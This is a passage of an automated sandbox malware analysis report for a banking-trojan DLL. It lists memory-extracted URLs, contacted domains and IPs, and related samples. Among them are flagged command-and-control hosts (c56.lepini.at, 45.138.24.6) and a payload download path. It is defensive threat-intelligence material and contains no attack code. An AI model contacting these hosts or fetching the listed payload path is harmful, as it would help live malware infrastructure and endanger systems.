        http://search.yahoo.co.jp0%URL Reputationsafe
        http://search.yahoo.co.jp0%URL Reputationsafe
        http://buscador.terra.es/0%URL Reputationsafe
        http://buscador.terra.es/0%URL Reputationsafe
        http://buscador.terra.es/0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://www.typography.netD0%URL Reputationsafe
        http://fontfabrik.com0%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        app.crasa.at
        128.14.142.220
        truefalseunknown
        c56.lepini.at
        45.138.24.6
        truetrueunknown
        resolver1.opendns.com
        208.67.222.222
        truefalse
          high
          api3.lepini.at
          45.138.24.6
          truefalseunknown
          api10.laptok.at
          45.138.24.6
          truefalseunknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://search.chol.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
            high
            http://www.mercadolivre.com.br/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://search.ebay.de/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
              high
              http://www.mtv.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                high
                http://www.rambler.ru/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                  high
                  http://www.nifty.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                    high
                    http://www.dailymail.co.uk/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    http://www3.fnac.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                      high
                      http://buscar.ya.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                        high
                        http://search.yahoo.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                          high
                          http://universalstore.streaming.mediaservices.windows.net/411ee20d-d1b8-4d57-ae3f-af22235d79d9/1f8e1RuntimeBroker.exe, 00000025.00000000.580472271.0000021913216000.00000004.00000001.sdmpfalse
                            high
                            http://constitution.org/usdeclar.txtC:loaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://https://file://USER.ID%lu.exe/updloaddll32.exe, 00000000.00000003.545737317.00000000013C0000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000002.566786483.0000000001380000.00000040.00000001.sdmp, powershell.exe, 00000017.00000003.539190602.000001F7F6630000.00000004.00000001.sdmp, explorer.exe, 00000020.00000002.723498987.0000000004E1E000.00000004.00000001.sdmp, control.exe, 00000021.00000002.568818148.0000000000B0E000.00000004.00000001.sdmp, RuntimeBroker.exe, 00000023.00000002.714776088.0000021DB8A3E000.00000004.00000001.sdmp, rundll32.exe, 00000024.00000002.569771101.000002067578E000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            low
                            http://www.sogou.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                              high
                              http://www.fontbureau.com/designersexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                high
                                http://asp.usatoday.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                  high
                                  http://fr.search.yahoo.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                    high
                                    http://rover.ebay.comexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                      high
                                      http://in.search.yahoo.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                        high
                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                          high
                                          http://search.ebay.in/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                            high
                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            unknown
                                            https://nuget.org/nuget.exepowershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpfalse
                                              high
                                              http://www.galapagosdesign.com/DPleaseexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              http://%s.comexplorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              low
                                              http://msk.afisha.ru/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                high
                                                http://www.zhongyicts.com.cnexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                • URL Reputation: safe
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000017.00000002.585596596.000001F7DDD11000.00000004.00000001.sdmpfalse
                                                  high
                                                  http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  http://search.rediff.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                    high
                                                    http://www.autoitscript.com/autoit3/Jexplorer.exe, 00000020.00000002.707268029.000000000095C000.00000004.00000020.sdmpfalse
                                                      high
                                                      http://www.ya.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                        high
                                                        http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://it.search.dada.net/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        http://search.naver.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                          high
                                                          http://www.google.ru/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                            high
                                                            http://search.hanafos.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpfalse
                                                              high
                                                              http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              http://www.abril.com.br/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              http://search.daum.net/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                high
                                                                https://contoso.com/Iconpowershell.exe, 00000017.00000002.602970651.000001F7EDD72000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                http://search.naver.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                  high
                                                                  http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  http://www.clarin.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                    high
                                                                    http://buscar.ozu.es/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    unknown
                                                                    http://kr.search.yahoo.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                      high
                                                                      http://search.about.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                        high
                                                                        http://busca.igbusca.com.br/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        • URL Reputation: safe
                                                                        unknown
                                                                        http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                          high
                                                                          http://www.ask.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                            high
                                                                            http://www.priceminister.com/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                              high
                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000017.00000002.586167297.000001F7DDF1E000.00000004.00000001.sdmpfalse
                                                                                high
                                                                                http://www.cjmall.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                  high
                                                                                  http://search.centrum.cz/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                    high
                                                                                    http://www.carterandcone.comlexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    http://suche.t-online.de/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                      high
                                                                                      http://www.google.it/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                        high
                                                                                        http://search.auction.co.kr/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        http://www.ceneo.pl/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                          high
                                                                                          http://www.amazon.de/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                            high
                                                                                            http://sads.myspace.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                              high
                                                                                              http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://google.pchome.com.tw/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                high
                                                                                                http://www.rambler.ru/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                  high
                                                                                                  http://uk.search.yahoo.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                    high
                                                                                                    http://espanol.search.yahoo.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                      high
                                                                                                      http://www.ozu.es/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      http://search.sify.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                        high
                                                                                                        http://openimage.interpark.com/interpark.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                          high
                                                                                                          http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          unknown
                                                                                                          http://search.ebay.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                            high
                                                                                                            http://www.gmarket.co.kr/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://www.founder.com.cn/cn/bTheexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            • URL Reputation: safe
                                                                                                            unknown
                                                                                                            http://search.nifty.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                              high
                                                                                                              http://searchresults.news.com.au/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              • URL Reputation: safe
                                                                                                              unknown
                                                                                                              http://www.google.si/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                high
                                                                                                                http://www.google.cz/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                  high
                                                                                                                  http://www.soso.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                    high
                                                                                                                    http://www.univision.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                      high
                                                                                                                      http://search.ebay.it/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                        high
                                                                                                                        http://ns.adobe.cmgRuntimeBroker.exe, 00000025.00000000.575870278.0000021910AF8000.00000004.00000001.sdmpfalse
                                                                                                                        • Avira URL Cloud: safe
                                                                                                                        unknown
                                                                                                                        http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                          high
                                                                                                                          http://www.asharqalawsat.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          unknown
                                                                                                                          http://busca.orange.es/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                            high
                                                                                                                            http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                              high
                                                                                                                              http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000020.00000000.561193755.00000000075A0000.00000002.00000001.sdmpfalse
                                                                                                                                high
                                                                                                                                http://search.yahoo.co.jpexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                • URL Reputation: safe
                                                                                                                                unknown
                                                                                                                                http://www.target.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                  high
                                                                                                                                  http://buscador.terra.es/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.typography.netDexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://fontfabrik.comexplorer.exe, 00000020.00000000.564502715.000000000B1A6000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://search.orange.co.uk/favicon.icoexplorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.iask.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  • URL Reputation: safe
                                                                                                                                  unknown
                                                                                                                                  http://www.tesco.com/explorer.exe, 00000020.00000000.561705188.0000000007693000.00000002.00000001.sdmpfalse
                                                                                                                                    high

                                                                                                                                    Contacted IPs

                                                                                                                                    • No. of IPs < 25%
                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                    • 75% < No. of IPs

                                                                                                                                    Public

                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                    128.14.142.220
                                                                                                                                    unknownUnited States
                                                                                                                                    21859ZNETUSfalse
                                                                                                                                    45.138.24.6
                                                                                                                                    unknownTurkey
                                                                                                                                    62068SPECTRAIPSpectraIPBVNLtrue

                                                                                                                                    General Information

                                                                                                                                    Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                    Analysis ID:343316
                                                                                                                                    Start date:22.01.2021
                                                                                                                                    Start time:19:08:29
                                                                                                                                    Joe Sandbox Product:CloudBasic
                                                                                                                                    Overall analysis duration:0h 10m 39s
                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                    Report type:light
                                                                                                                                    Sample file name:out.dll
                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                    Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                    Number of analysed new started processes analysed:37
                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                    Number of injected processes analysed:3
                                                                                                                                    Technologies:
                                                                                                                                    • HCA enabled
                                                                                                                                    • EGA enabled
                                                                                                                                    • HDC enabled
                                                                                                                                    • AMSI enabled
                                                                                                                                    Analysis Mode:default
                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                    Detection:MAL
                                                                                                                                    Classification:mal100.bank.troj.spyw.evad.winDLL@28/33@7/2
                                                                                                                                    EGA Information:Failed
                                                                                                                                    HDC Information:
                                                                                                                                    • Successful, ratio: 16.4% (good quality ratio 15.9%)
                                                                                                                                    • Quality average: 80.8%
                                                                                                                                    • Quality standard deviation: 26.8%
                                                                                                                                    HCA Information:
                                                                                                                                    • Successful, ratio: 93%
                                                                                                                                    • Number of executed functions: 0
                                                                                                                                    • Number of non-executed functions: 0
                                                                                                                                    Cookbook Comments:
                                                                                                                                    • Adjust boot time
                                                                                                                                    • Enable AMSI
                                                                                                                                    • Found application associated with file extension: .dll
                                                                                                                                    Warnings:
                                                                                                                                    Show All
                                                                                                                                    • Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
                                                                                                                                    • TCP Packets have been reduced to 100
                                                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, taskhostw.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                                                                                                                    • Excluded IPs from analysis (whitelisted): 168.61.161.212, 104.43.139.144, 51.11.168.160, 92.122.213.247, 92.122.213.194, 52.155.217.156, 2.20.142.210, 2.20.142.209, 20.54.26.129, 51.103.5.159, 88.221.62.148, 152.199.19.161, 95.101.184.67
                                                                                                                                    • Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, wns.notify.windows.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, go.microsoft.com, emea1.notify.windows.com.akadns.net, audownload.windowsupdate.nsatc.net, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, e1723.g.akamaiedge.net, skypedataprdcolcus16.cloudapp.net, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, par02p.wns.notify.trafficmanager.net, cs9.wpc.v0cdn.net
                                                                                                                                    • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                    • Report size getting too big, too many NtReadVirtualMemory calls found.

                                                                                                                                    Simulations

                                                                                                                                    Behavior and APIs

                                                                                                                                    TimeTypeDescription
                                                                                                                                    19:10:44API Interceptor42x Sleep call for process: powershell.exe modified
                                                                                                                                    19:11:10API Interceptor1x Sleep call for process: loaddll32.exe modified

                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                    IPs

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    128.14.142.220zISJXAAewo.exeGet hashmaliciousBrowse
                                                                                                                                    • www.switchtoambitwithmirtha.com/jskg/?Rl=XPDQeRp5aGT4jtA0ci8iQ+S2cwkPQKp/uicl856RnXP7VfNf5veI1DtwdqAWl+KRErQ/&1bwHc=yVMpBJZhmT_xj43
                                                                                                                                    zISJXAAewo.exeGet hashmaliciousBrowse
                                                                                                                                    • www.switchtoambitwithmirtha.com/jskg/?X2JtLRIH=XPDQeRp5aGT4jtA0ci8iQ+S2cwkPQKp/uicl856RnXP7VfNf5veI1DtwdqA86O6RApY/&blv=UVIpcz0pIRTp
                                                                                                                                    CLxJeVvzMA.exeGet hashmaliciousBrowse
                                                                                                                                    • www.switchtoambitwithmirtha.com/jskg/?TXIxB=Z0GD8lz8DJ7&K2JDYN=XPDQeRp5aGT4jtA0ci8iQ+S2cwkPQKp/uicl856RnXP7VfNf5veI1DtwdqA86O6RApY/
                                                                                                                                    45.138.24.6SecuriteInfo.com.Generic.mg.81f401defa8faa2e.dllGet hashmaliciousBrowse
                                                                                                                                    • c56.lepini.at/jvassets/xI/t64.dat

                                                                                                                                    Domains

                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                    resolver1.opendns.comSecuriteInfo.com.Generic.mg.81f401defa8faa2e.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    6007d134e83fctar.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    J5cB3wfXIZ.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    6006bde674be5pdf.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    mal.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    fo.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5fd9d7ec9e7aetar.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5fd885c499439tar.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5fc612703f844.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    https___purefile24.top_4352wedfoifom.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    vnaSKDMnLG.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    5fbce6bbc8cc4png.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 208.67.222.222
                                                                                                                                    c56.lepini.atSecuriteInfo.com.Generic.mg.81f401defa8faa2e.dllGet hashmaliciousBrowse
                                                                                                                                    • 45.138.24.6
                                                                                                                                    u.dllGet hashmaliciousBrowse
                                                                                                                                    • 46.173.218.93
                                                                                                                                    fo.dllGet hashmaliciousBrowse
                                                                                                                                    • 46.173.218.93
                                                                                                                                    onerous.tar.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0xyZ4rY0opA2.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6Xt3u55v5dAj.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    JeSoTz0An7tn.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    1qdMIsgkbwxA.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    2Q4tLHa5wbO1.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0wDeH3QW0mRu.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    0k4Vu1eOEIhU.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    earmarkavchd.dllGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
                                                                                                                                    6znkPyTAVN7V.vbsGet hashmaliciousBrowse
                                                                                                                                    • 47.241.19.44
